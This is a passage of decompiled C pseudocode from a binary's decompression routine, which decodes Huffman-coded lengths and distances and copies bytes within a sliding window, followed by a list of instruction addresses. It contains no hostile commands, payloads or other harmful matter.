															_t357 = E00A0A9F3(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00A0A9F3(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E00A1F750(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E00A1F750(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00A13B93(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00A1207E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E00A0A9F3(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E00A0A9F3(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E00A1F750(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00A1839A(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00A1839A(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E00A0A9F3(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E00A14DF4(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E00A13FAE(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}


















































































































































                                                        0x00a17304
                                                        0x00a17308
                                                        0x00a1730e
                                                        0x00a17337
                                                        0x00a1733a
                                                        0x00a1733f
                                                        0x00a17342
                                                        0x00a17329
                                                        0x00a17329
                                                        0x00000000
                                                        0x00a17344
                                                        0x00a1734f
                                                        0x00a17352
                                                        0x00a17355
                                                        0x00a17359
                                                        0x00a1735d
                                                        0x00a17361
                                                        0x00a17363
                                                        0x00a17365
                                                        0x00a17365
                                                        0x00a17369
                                                        0x00a17376
                                                        0x00a17376
                                                        0x00a1737c
                                                        0x00a1737f
                                                        0x00a17381
                                                        0x00a17385
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17387
                                                        0x00a17387
                                                        0x00a17389
                                                        0x00a17914
                                                        0x00a17914
                                                        0x00a17916
                                                        0x00000000
                                                        0x00a17917
                                                        0x00a1738f
                                                        0x00a1739d
                                                        0x00a1739d
                                                        0x00a1739f
                                                        0x00a173ae
                                                        0x00a173ae
                                                        0x00a173b4
                                                        0x00a17c63
                                                        0x00a17c63
                                                        0x00000000
                                                        0x00a17c63
                                                        0x00000000
                                                        0x00a173b4
                                                        0x00a173a1
                                                        0x00a173a8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a173a8
                                                        0x00a17394
                                                        0x00a17397
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a173ba
                                                        0x00a173ba
                                                        0x00a173c7
                                                        0x00a173cc
                                                        0x00a17400
                                                        0x00a17400
                                                        0x00a17405
                                                        0x00a1740c
                                                        0x00a17412
                                                        0x00a17418
                                                        0x00a1741c
                                                        0x00a17456
                                                        0x00a17457
                                                        0x00a17458
                                                        0x00a1745a
                                                        0x00a17473
                                                        0x00a17476
                                                        0x00a1747d
                                                        0x00a17480
                                                        0x00a17483
                                                        0x00a1748c
                                                        0x00a17495
                                                        0x00a17497
                                                        0x00a1749a
                                                        0x00a1749c
                                                        0x00a1749c
                                                        0x00a1749e
                                                        0x00a174a6
                                                        0x00a174a9
                                                        0x00a174ae
                                                        0x00a174b0
                                                        0x00a174c9
                                                        0x00a174cf
                                                        0x00a178eb
                                                        0x00a178ed
                                                        0x00a17920
                                                        0x00a17926
                                                        0x00a17a42
                                                        0x00a17a42
                                                        0x00a17a4b
                                                        0x00a17a4e
                                                        0x00a17a50
                                                        0x00a17a54
                                                        0x00a17a63
                                                        0x00a17a63
                                                        0x00a17a66
                                                        0x00a17a6b
                                                        0x00a17a72
                                                        0x00a17a78
                                                        0x00a17a7e
                                                        0x00a17a85
                                                        0x00a17ab3
                                                        0x00a17ab4
                                                        0x00a17ab5
                                                        0x00a17ab7
                                                        0x00a17ad3
                                                        0x00a17ad6
                                                        0x00a17add
                                                        0x00a17ae0
                                                        0x00a17ae3
                                                        0x00a17aef
                                                        0x00a17afb
                                                        0x00a17afd
                                                        0x00a17b03
                                                        0x00a17b05
                                                        0x00a17b05
                                                        0x00a17b07
                                                        0x00a17b0f
                                                        0x00a17b0f
                                                        0x00a17b12
                                                        0x00a17b15
                                                        0x00a17b26
                                                        0x00a17b29
                                                        0x00a17b29
                                                        0x00a17b17
                                                        0x00a17b17
                                                        0x00a17b17
                                                        0x00a17b2b
                                                        0x00a17b2e
                                                        0x00a17b30
                                                        0x00a17b35
                                                        0x00a17b3c
                                                        0x00a17b44
                                                        0x00a17b46
                                                        0x00a17b4d
                                                        0x00a17b50
                                                        0x00a17b50
                                                        0x00a17b53
                                                        0x00a17b53
                                                        0x00a17b56
                                                        0x00a17b61
                                                        0x00a17b65
                                                        0x00a17b6a
                                                        0x00a17b6d
                                                        0x00a17b6f
                                                        0x00a17c23
                                                        0x00a17c23
                                                        0x00a17c26
                                                        0x00a17c28
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17c2e
                                                        0x00a17c34
                                                        0x00a17c3a
                                                        0x00a17c3f
                                                        0x00a17c43
                                                        0x00a17c49
                                                        0x00a17c52
                                                        0x00a17c55
                                                        0x00a17c55
                                                        0x00a17c55
                                                        0x00a17c5a
                                                        0x00a17c5a
                                                        0x00a174c1
                                                        0x00a174c1
                                                        0x00000000
                                                        0x00a17b75
                                                        0x00a17b75
                                                        0x00a17b77
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17b7d
                                                        0x00a17b83
                                                        0x00a17b85
                                                        0x00a17b8b
                                                        0x00a17b8f
                                                        0x00a17b92
                                                        0x00a17b96
                                                        0x00a17be8
                                                        0x00a17beb
                                                        0x00a1781f
                                                        0x00a1781f
                                                        0x00a17822
                                                        0x00a17824
                                                        0x00a1736e
                                                        0x00a17372
                                                        0x00a17372
                                                        0x00a17376
                                                        0x00a17376
                                                        0x00a1737c
                                                        0x00a1737f
                                                        0x00a17381
                                                        0x00a17385
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17385
                                                        0x00a17376
                                                        0x00a1782d
                                                        0x00a1782f
                                                        0x00a17832
                                                        0x00a17835
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1783e
                                                        0x00a17841
                                                        0x00a17844
                                                        0x00a17847
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17850
                                                        0x00a17853
                                                        0x00a17856
                                                        0x00a17859
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17862
                                                        0x00a17865
                                                        0x00a17868
                                                        0x00a1786b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17874
                                                        0x00a17877
                                                        0x00a1787a
                                                        0x00a1787d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17886
                                                        0x00a17889
                                                        0x00a1788d
                                                        0x00a17890
                                                        0x00a17893
                                                        0x00a1789c
                                                        0x00a1789f
                                                        0x00a1789f
                                                        0x00000000
                                                        0x00a17893
                                                        0x00a17bf3
                                                        0x00a17bf3
                                                        0x00a17bf6
                                                        0x00a17bfa
                                                        0x00a17bfc
                                                        0x00a17c00
                                                        0x00a17c05
                                                        0x00a17c09
                                                        0x00a17c0c
                                                        0x00a17c0f
                                                        0x00a17c12
                                                        0x00a17c15
                                                        0x00a17c19
                                                        0x00a17c19
                                                        0x00a17c19
                                                        0x00a1781b
                                                        0x00a1781b
                                                        0x00000000
                                                        0x00a1781b
                                                        0x00a17b98
                                                        0x00a17b9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17ba3
                                                        0x00a17ba3
                                                        0x00a17ba6
                                                        0x00a17ba9
                                                        0x00a17bac
                                                        0x00a17bb1
                                                        0x00a17bb7
                                                        0x00a17bbd
                                                        0x00a17bc3
                                                        0x00a17bc9
                                                        0x00a17bcf
                                                        0x00a17bd2
                                                        0x00a17bd5
                                                        0x00a17bd8
                                                        0x00a17bdb
                                                        0x00a17bde
                                                        0x00a17bde
                                                        0x00a17bde
                                                        0x00000000
                                                        0x00a17be3
                                                        0x00a17b6f
                                                        0x00a17abf
                                                        0x00a17ac2
                                                        0x00a17ac2
                                                        0x00a17ac4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17ac6
                                                        0x00a17ac7
                                                        0x00a17aca
                                                        0x00a17acd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17acf
                                                        0x00a17ad1
                                                        0x00000000
                                                        0x00a17ad1
                                                        0x00a17a89
                                                        0x00a17a8c
                                                        0x00a17a96
                                                        0x00a17a9e
                                                        0x00a17aa4
                                                        0x00a17aa7
